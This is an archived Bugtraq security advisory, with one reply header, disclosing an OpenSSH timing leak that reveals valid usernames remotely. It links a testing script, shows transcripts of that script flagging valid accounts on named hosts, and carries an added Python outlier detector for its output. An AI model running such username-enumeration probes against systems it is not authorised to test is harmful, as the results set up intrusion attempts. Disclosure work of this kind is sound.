yet another OpenSSH timing leak? Oct 09 2006 10:33AM
Marco Ivaldi (raptor 0xdeadbeef info) (1 replies)
Hello Bugtraq,

Here we are again... During a recent penetration test I stumbled upon yet
another OpenSSH timing leak, leading to remote disclosure of valid
usernames. It's not as big as the one I found in the past (CVE-2003-0190),
but it can indeed be exploited over the Internet, nevertheless.

This time, OpenSSH-portable apparently introduces a small delay (see
attached transcript for details) when verifying access credentials for
users with a password set: it doesn't matter if they don't have a valid
shell or login has been disabled through an sshd_config directive.

So far, I've not been able to determine the root cause of this exposure
and I've reproduced it only on some fully-patched SUSE Linux 10.0 boxes
(OpenSSH_4.1 + SUSE patches, both protocols 1 and 2 are affected, with or
without PAM authentication), therefore it may be a SUSE-specific and/or a
configuration-dependent flaw (latest tests on some freshly installed SUSE
systems didn't show the flawed behaviour).

That said, there are probably other timing leaks involving third-party
patches (x509 certs, LDAP, and so on), logging, and custom configurations,
as well as other ways in which valid usernames may be probed for (i.e.,
with RSA/DSA authentication) -- thus I decided to release a small script
for testing timing patterns in sshd replies:

http://www.0xdeadbeef.info/code/sshtime

It needs expect, and the target ssh hostkey must already be added. I'd be
very interested in knowing the results of tests performed on other distros
and configurations.

Thanks to Solar Designer and Andrea Barisani for the interesting
discussion on this topic.

Cheers,

--
Marco Ivaldi
Antifork Research, Inc. http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707

raptor@pandora:~$ #
raptor@pandora:~$ # Over 100 Mbps LAN (slow computer)
raptor@pandora:~$ #
raptor@pandora:~$ ./sshtime 2.mediaservice.net smalldict
sshtime v0.1 - Simple OpenSSH remote timing attack tool
Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
admin@2.mediaservice.net real 0.13
ftp@2.mediaservice.net real 0.13
media@2.mediaservice.net real 0.80 <- valid user with shell
nobody@2.mediaservice.net real 0.13
raptor@2.mediaservice.net real 0.13
root@2.mediaservice.net real 0.79 <- valid user with shell
test@2.mediaservice.net real 0.13
wwwrun@2.mediaservice.net real 0.14
raptor@pandora:~$ #
raptor@pandora:~$ # 100 Mbps LAN (faster computer)
raptor@pandora:~$ #
raptor@pandora:~$ ./sshtime 3.mediaservice.net smalldict
sshtime v0.1 - Simple OpenSSH remote timing attack tool
Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
admin@3.mediaservice.net real 0.09
ftp@3.mediaservice.net real 0.09
media@3.mediaservice.net real 0.32 <- valid user with shell
nobody@3.mediaservice.net real 0.09
raptor@3.mediaservice.net real 0.09
root@3.mediaservice.net real 0.32 <- valid user with shell
test@3.mediaservice.net real 0.09
wwwrun@3.mediaservice.net real 0.09
raptor@pandora:~$ #
raptor@pandora:~$ # Over the Internet
raptor@pandora:~$ #
raptor@pandora:~$ ./sshtime 4.mediaservice.net smalldict
sshtime v0.1 - Simple OpenSSH remote timing attack tool
Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
admin@4.mediaservice.net real 1.22
ftp@4.mediaservice.net real 1.17
media@4.mediaservice.net real 1.22
nobody@4.mediaservice.net real 1.17
raptor@4.mediaservice.net real 1.22
root@4.mediaservice.net real 1.77 <- valid user with shell
test@4.mediaservice.net real 1.27
wwwrun@4.mediaservice.net real 1.77 <- valid user without shell
raptor@pandora:~$

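A check on the kind of numbers the transcript above shows, added here and not part of the post or of the sshtime script: it parses sshtime-style result lines and applies a median/MAD outlier test to tell which accounts answer measurably slower than the baseline, so an administrator running the script against their own host can see whether it exhibits the pattern. The names parse_sshtime and flag_outliers are chosen for this example, and both sample runs are constructed (the first mirrors the "over the Internet" figures from the transcript).

```python
"""Flag accounts whose sshd reply time stands out (median/MAD outlier test).

Added example, not the sshtime script from the post: it reads the line shape
sshtime prints ("user@host real <seconds>"); parse_sshtime and flag_outliers
are names chosen here.
"""
import re
from statistics import median
# One result line: "<user>@<host> real <seconds>"; anything else is skipped.
LINE_RE = re.compile(r"^([^@\s]+)@(\S+)\s+real\s+(\d+(?:\.\d+)?)")

def parse_sshtime(text):
    """Return {user: seconds} for every result line of sshtime-style output."""
    times = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            times[m.group(1)] = float(m.group(3))
    return times

def flag_outliers(times, k=5.0, floor=0.05):
    """Return (threshold, sorted users slower than median + max(k*MAD, floor)).

    Median and MAD ignore the few slow accounts we are hunting for; the floor
    stops a near-zero MAD (identical baseline timings) from flagging jitter.
    """
    vals = list(times.values())
    med = median(vals)
    mad = median(abs(v - med) for v in vals)
    threshold = med + max(k * mad, floor)
    return threshold, sorted(u for u, t in times.items() if t > threshold)

# Constructed sample mirroring the "over the Internet" run in the transcript.
INTERNET_RUN = """\
admin@4.mediaservice.net real 1.22
ftp@4.mediaservice.net real 1.17
media@4.mediaservice.net real 1.22
nobody@4.mediaservice.net real 1.17
raptor@4.mediaservice.net real 1.22
root@4.mediaservice.net real 1.77
test@4.mediaservice.net real 1.27
wwwrun@4.mediaservice.net real 1.77
"""
# Constructed jitter-only run: no account should be flagged.
FLAT_RUN = "a@h real 0.13\nb@h real 0.14\nc@h real 0.13\nd@h real 0.15\n"

if __name__ == "__main__":
    for name, run in (("internet", INTERNET_RUN), ("flat", FLAT_RUN)):
        threshold, slow = flag_outliers(parse_sshtime(run))
        print(f"{name}: threshold {threshold:.2f}s, slower: {slow or 'none'}")
```

On the transcript's Internet figures the threshold lands at about 1.47 s, so root and wwwrun are separated from the rest while the 1.27 s of test stays within the jitter band; repeating the run several times before drawing conclusions is still advisable.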
Re: yet another OpenSSH timing leak? Oct 09 2006 10:41PM
Gianluca Varisco (giangy techtemple org)
Copyright 2010, SecurityFocus